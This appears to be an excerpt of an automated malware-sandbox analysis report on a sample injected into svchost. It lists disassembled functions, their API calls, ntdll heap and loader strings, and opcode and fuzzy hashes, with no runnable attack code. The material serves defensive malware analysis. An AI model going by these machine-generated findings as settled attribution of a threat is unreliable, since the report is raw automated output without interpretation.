                                                Function 00413EEE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 43 413eee-413ef1 44 413ef3-413ef4 43->44 45 413f64-413fbd call 42e673 call 42f083 call 4176f3 call 404793 call 424e03 43->45 46 413ef5 44->46 69 413fdd-413fe3 45->69 70 413fbf-413fce PostThreadMessageW 45->70 48 413ec2-413ec4 46->48 49 413ef7-413efc 46->49 51 413ec6-413ec9 48->51 52 413f1a-413f4a 48->52 54 413f08 49->54 51->54 56 413ecb-413ed2 51->56 54->52 58 413ed3-413edc 56->58 61 413f5b-413f63 58->61 62 413edd 58->62 61->45 62->46 65 413ede-413edf 62->65 65->58 66 413ee1-413ee2 65->66 66->46 70->69 71 413fd0-413fda 70->71 71->69
                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: a0ab73d9699f62229a457d3fb3d19d02f693c3ca4ea90a68e3a06eb3b7e9aa8f
                                                • Instruction ID: 509d82a56aa6430b59668e48231f84fa55fb7d97cd2f8da20a65b033e79e9690
                                                • Opcode Fuzzy Hash: a0ab73d9699f62229a457d3fb3d19d02f693c3ca4ea90a68e3a06eb3b7e9aa8f
                                                • Instruction Fuzzy Hash: 2D014472E412187ADF00EAA19C81DEFBB7C9F40314F41809AF904B7101D67C8F0787A6
                                                Function 00413F53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: ac782adfae06924529a5e30e35ae14f19731af2c22eadf78365bebbb227e609a
                                                • Instruction ID: 6d01010f3193c728dff8750c668049778dff0f75af4dfb14d32fd6d48a189152
                                                • Opcode Fuzzy Hash: ac782adfae06924529a5e30e35ae14f19731af2c22eadf78365bebbb227e609a
                                                • Instruction Fuzzy Hash: 1B012671E4021C7ADB00AAE18C81DEFBB7CDF40398F448069FA04B7241D6784F068BA6
                                                Function 0042C8B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 88 42c8b3-42c8f1 call 404823 call 42d773 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C8EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: AdA
                                                • API String ID: 3298025750-2387861824
                                                • Opcode ID: a11feda800877c3ca01a2445fb8be3737408e5d4f0e21bd15dd5f67d54a2a995
                                                • Instruction ID: bd2691eef80fdae047e5233976a03821307e3121a39e0aab946d347188c2706f
                                                • Opcode Fuzzy Hash: a11feda800877c3ca01a2445fb8be3737408e5d4f0e21bd15dd5f67d54a2a995
                                                • Instruction Fuzzy Hash: 8DE092B62042147FD614EE59DC41F9B33ACEFC8754F404419FE08A7241D675BD108BB8
                                                Function 0042C863 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 117 42c863-42c8a4 call 404823 call 42d773 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E534,?,?,00000000,?,0041E534,?,?,?), ref: 0042C89F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: b41a22985efab4936f4e254e00e7528fa4b8f6ba00195febd94db6b55783a08d
                                                • Instruction ID: 6a0403056a1718b8331bf25fb449449366c01ed9f6b1b2fcd939a4be5b47d379
                                                • Opcode Fuzzy Hash: b41a22985efab4936f4e254e00e7528fa4b8f6ba00195febd94db6b55783a08d
                                                • Instruction Fuzzy Hash: E8E092B66002147BDA14EE99DC41E9B33ADEFC9714F004419FA08A7241D674B910CBF8
                                                Function 0042C8F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 127 42c8f3-42c92f call 404823 call 42d773 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,D3E14140,?,?,D3E14140), ref: 0042C92A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: f812b8d679311479065400ef4eb868b648add57403b02bdd1dcec498a0c0e487
                                                • Instruction ID: 8f9d0e3605d52817696bfc98affba04082da645af57275fa49ccbf762d8680c5
                                                • Opcode Fuzzy Hash: f812b8d679311479065400ef4eb868b648add57403b02bdd1dcec498a0c0e487
                                                • Instruction Fuzzy Hash: 70E04F762006147BD210BB5ADC01FDB776CDBC5715F004419FA0867141C6B4790187E4
                                                Function 004177AF Relevance: 1.5, APIs: 1, Instructions: 21libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 132 4177af-4177c1 133 4177c3-4177c7 132->133 134 41775e-417767 LdrLoadDll 132->134 135 41776a-41776d 134->135
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417765
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 364b494068b57fc02dbd31a3a152f451159d28eba8c023834cb5350046488fd8
                                                • Instruction ID: 20a38ea404323331c6040c3588f7fe9b393f66cda626d6e5925b034bec05e4c6
                                                • Opcode Fuzzy Hash: 364b494068b57fc02dbd31a3a152f451159d28eba8c023834cb5350046488fd8
                                                • Instruction Fuzzy Hash: DFD02E31E887083BD7108F50ED42F98B320DB42248F2043AEE978EF2E2CAB116020682
                                                Function 03C72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 136 3c72c0a-3c72c0f 137 3c72c11-3c72c18 136->137 138 3c72c1f-3c72c26 LdrInitializeThunk 136->138
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                                • Instruction ID: 84faa90233bd227a4f600780950a8624567ebc6a859d33608038aac95c8ba62c
                                                • Opcode Fuzzy Hash: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                                • Instruction Fuzzy Hash: 73B09BB19015C5C5EA11F7604608757790567D0745F5AC461D303C685E4739C2D1E175

                                                Non-executed Functions

                                                Function 03CB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                                • Instruction ID: aeea6575664b303b0d03bbeb9d9d32d519b3d40015c05f24726aacc197937762
                                                • Opcode Fuzzy Hash: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                                • Instruction Fuzzy Hash: E0928A75608381AFD720DE25C884BABB7F8BB88754F084D2DFA95DB250D770E944CB92
                                                Function 03CE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                                • Instruction ID: 9d7dce24789fb40ff977518bff5a74f094d714bea92837fdc4a33fbe62415a4c
                                                • Opcode Fuzzy Hash: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                                • Instruction Fuzzy Hash: 1712C9756046829FC725DF29C440BBABBF5EF09704F0D8459E496CF682D738E9A0DB50
                                                Function 03C2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                • API String ID: 0-3532704233
                                                • Opcode ID: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                                • Instruction ID: 0f740e15b3622867d23963a33acda5f9c426cec1905d1b5820c944a0b7c0678c
                                                • Opcode Fuzzy Hash: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                                • Instruction Fuzzy Hash: 1DB1BFB65083619FC711EF24C484B6BBBE8AF98744F054D2EF89ADB240D770DA44CB92
                                                Function 03CC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                • API String ID: 0-3063724069
                                                • Opcode ID: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                                • Instruction ID: 7aeef9516231f1dd5a75fb4b70d58783c071b4a3d51c8eb3b11ffe59b4fa0bda
                                                • Opcode Fuzzy Hash: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                                • Instruction Fuzzy Hash: 8DD104B2814391AFD721DB64C844BAFF7F8AF84714F094A2DFA84DB250D770CA449B92
                                                Function 03CE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
                                                • Instruction ID: 999f04eca14c49a2ca8f355fc30e75c9ec0dcfe12cbacca1a292ff7799485455
                                                • Opcode Fuzzy Hash: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
                                                • Instruction Fuzzy Hash: A9D1EB365006A0DFCB22EF6AC440AADFBF1FF4A700F098059E855DF252C7B4AA41DB94
                                                Function 03C2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03C2D262
                                                • @, xrefs: 03C2D2AF
                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03C2D0CF
                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03C2D146
                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 03C2D196
                                                • @, xrefs: 03C2D313
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03C2D2C3
                                                • @, xrefs: 03C2D0FD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                • API String ID: 0-1356375266
                                                • Opcode ID: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                                • Instruction ID: af4fcbf12c9de4b1e460a68bd190f137aa02439ed57a2f21bc7c4e55b5142e14
                                                • Opcode Fuzzy Hash: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                                • Instruction Fuzzy Hash: FDA19B759083559FD320DF25C488B6BBBE8BB84729F014D2EE999DA240D774DA08CF93
                                                Function 03C2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                                • Instruction ID: 5601b05e4e032a7c7b429a112b8deb5f94814d330cf8135b89f3dd2bb7448a73
                                                • Opcode Fuzzy Hash: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                                • Instruction Fuzzy Hash: 8742ED752083959FC715EF29C884A2AFBF5FF85608F08496DE486CB392D730EA41CB52
                                                Function 03C4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                                • Instruction ID: 28b675d987838117330043e859db52ecf93edab2ec4362c1d63bf91e131efdcf
                                                • Opcode Fuzzy Hash: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                                • Instruction Fuzzy Hash: 88C14A31A00315ABDF24DF69C894BBEF7A5AF46300F194069E886DF291EBB4DD44D3A1
                                                Function 03C663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                                • Instruction ID: 401a976d6696826e40c6c12aaabc568797d04490f6c7b7937c1e4415a19dc6ef
                                                • Opcode Fuzzy Hash: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                                • Instruction Fuzzy Hash: 3B916A35A00B159BDB38EF2AD884BBEB7A1FB51728F050128E911EF781D7B49911D790
                                                Function 03C6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializeProcess, xrefs: 03C6C6C4
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 03CA8181, 03CA81F5
                                                • LdrpInitializeImportRedirection, xrefs: 03CA8177, 03CA81EB
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 03CA81E5
                                                • Loading import redirection DLL: '%wZ', xrefs: 03CA8170
                                                • minkernel\ntdll\ldrinit.c, xrefs: 03C6C6C3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                                • Instruction ID: 27c9893bb2149173afc46c104941952e22cdb6c17c1ec651e4f26d593d9eebeb
                                                • Opcode Fuzzy Hash: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                                • Instruction Fuzzy Hash: 5D310476744741AFC224EF28D946E2AB7E4EF94B14F050968F881EF291D620ED04D7A2
                                                Function 03C62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 03CA21BF
                                                • SXS: %s() passed the empty activation context, xrefs: 03CA2165
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 03CA219F
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03CA2180
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03CA2178
                                                • RtlGetAssemblyStorageRoot, xrefs: 03CA2160, 03CA219A, 03CA21BA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                                • Instruction ID: 6916c881a41f950019498c1d2f77126f589f02c97e221302d42998ffb5c3d423
                                                • Opcode Fuzzy Hash: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                                • Instruction Fuzzy Hash: 45310336F40225BBE721CA99CC81F9EB678DB95A44F094469FB04FB241D671EE00E7A1
                                                Function 03C551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                Download Yara Rule
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 03C5542B
                                                • Kernel-MUI-Language-Allowed, xrefs: 03C5527B
                                                • Kernel-MUI-Language-Disallowed, xrefs: 03C55352
                                                • Kernel-MUI-Number-Allowed, xrefs: 03C55247
                                                • WindowsExcludedProcs, xrefs: 03C5522A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                                • Instruction ID: 80d60eb807c4320fec72bba974ecd46de9b097f89655a218400b89b5f48f5f08
                                                • Opcode Fuzzy Hash: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                                • Instruction Fuzzy Hash: 84F16C76D10218EFCF11DF99C980AEEBBB9FF49650F16406AE902EB250D7709E40DB94
                                                Function 03C5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1975516107
                                                • Opcode ID: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                                • Instruction ID: 4d37704eabfd067065bbddff75f749ae4b4470e54d57ed5fcde24c9d5df644a4
                                                • Opcode Fuzzy Hash: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                                • Instruction Fuzzy Hash: 57510F36A00345DFDB24EFA4D48879DBBB1BF59304F294059E802EF291C770AA80CBC4
                                                Function 03C276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                • Opcode ID: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                                • Instruction ID: e9a8cb2dd3a9e927e0358f40e721af50ff32aff61212d1e208949f8525ffdb9f
                                                • Opcode Fuzzy Hash: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                                • Instruction Fuzzy Hash: 810128761097A0DED22AF31AA409F56BBE4DB42B74F194059E010CF692CAA4AD80D560
                                                Function 03C470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                                • Instruction ID: 1f03a5d7873bcf6f2235eef059de66839e415d2f67846c08c87144ed7772d47f
                                                • Opcode Fuzzy Hash: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                                • Instruction Fuzzy Hash: BA139970A00759CFDB29CF69C8907A9FBB1BF49304F1881A9D859EF381D735AA45CB90
                                                Function 03C41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-3570731704
                                                • Opcode ID: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
                                                • Instruction ID: a1d0ae9520d3b11266be84396c5945290bf75d2e0d7382c5b70b859d1afc349c
                                                • Opcode Fuzzy Hash: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
